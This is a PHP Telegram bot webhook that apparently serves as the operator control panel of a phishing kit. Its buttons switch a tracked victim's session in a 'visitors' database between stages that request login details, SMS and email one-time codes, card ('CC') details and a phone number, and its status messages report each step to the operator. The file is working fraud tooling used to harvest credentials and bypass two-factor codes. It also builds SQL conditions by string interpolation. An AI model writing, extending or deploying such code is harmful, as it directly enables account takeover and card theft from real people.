<?php
require_once __DIR__.'/../app/config/config.php';
include_once __DIR__."/../app/libraries/Telegram.php";
include_once __DIR__."/../app/libraries/Database.php";

$input = json_decode(file_get_contents('php://input'), true);
file_put_contents('telegram-log.json', json_encode($input, JSON_PRETTY_PRINT) . "\n", FILE_APPEND);

$telegram = new Telegram(BOT_TOKEN);
$chat_id = $telegram->ChatID();
$msg = $telegram->Text();
$data = $telegram->getData();

$action = null;
if (isset($data['callback_query']['data'])) {
    $callbackData = json_decode($data['callback_query']['data'], true);
    $action = $callbackData['action'] ?? null;
}

$uniqueid = null;
if (isset($data['callback_query']['message']['text'])) {
    preg_match('/ID\s*:\s*([a-zA-Z0-9]+)/', $data['callback_query']['message']['text'], $matches);
    $uniqueid = $matches[1] ?? null;
}

if (isset($input['callback_query'])) {
    $callback_id = $input['callback_query']['id'];
    file_get_contents("https://api.telegram.org/bot" . BOT_TOKEN . "/answerCallbackQuery?callback_query_id={$callback_id}");

    $db = new Database("localhost", SQL_USER_NAME, SQL_USER_PASS, SQL_DATABASE_NAME, "visitors");
    $statusMap = [
        'login' => 1,
        'otp'   => 2,
        'eotp'  => 3,
        'alert' => 4,
        'cc'    => 5,
        'ecc'   => 6,
        'mb'    => 7,
        'emb'   => 8,
        'emotp' => 9,
        'eemotp'=> 10,
        'fns'   => 11,
        'del'   => 12
    ];

    $statusMessages = [
        'login' => '🔄 Login process restarted.',
        'otp'   => '📧 SMS code requested.',
        'eotp'  => '❌ SMS code re-requested due to error.',
        'alert' => 'Alert command sent to user.',
        'cc'    => '🔐 Profile details requested.',
        'ecc'   => '🔐 CC details requested.',
        'mb'    => '📲 Email details requested.',
        'emb'   => '📲 Email details re-requested due to error.',
        'emotp' => '📧 Email code requested.',
        'eemotp'=> '❌ Email code re-requested due to error.',
        'fns'   => '✅ Session finished.',
        'del'   => '🗑️ User deleted from the system.'
    ];

    if ($uniqueid) {
        $condition = "WHERE uniqueid='$uniqueid'";

        // Handle KYC action separately
        if ($action === 'kyc') {
            $message = "📱 Please reply to this message with your phone number. ID: $uniqueid";
            send($message, BOT_TOKEN, $chat_id);
        } elseif (isset($statusMap[$action])) {
            $db->update(['status' => $statusMap[$action]], $condition);
            send($statusMessages[$action], BOT_TOKEN, $chat_id);
        } elseif ($action === 'del') {
            $db->delete($condition);
            send($statusMessages['del'], BOT_TOKEN, $chat_id);
        } else {
            send("❌ Unknown action received: `$action`", BOT_TOKEN, $chat_id);
        }
    } else {
        send("⚠️ Could not extract unique ID.", BOT_TOKEN, $chat_id);
    }
}


function send($msg, $token, $chat_id) {
    $data = ['chat_id' => $chat_id, 'text' => $msg];
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data));
}
?>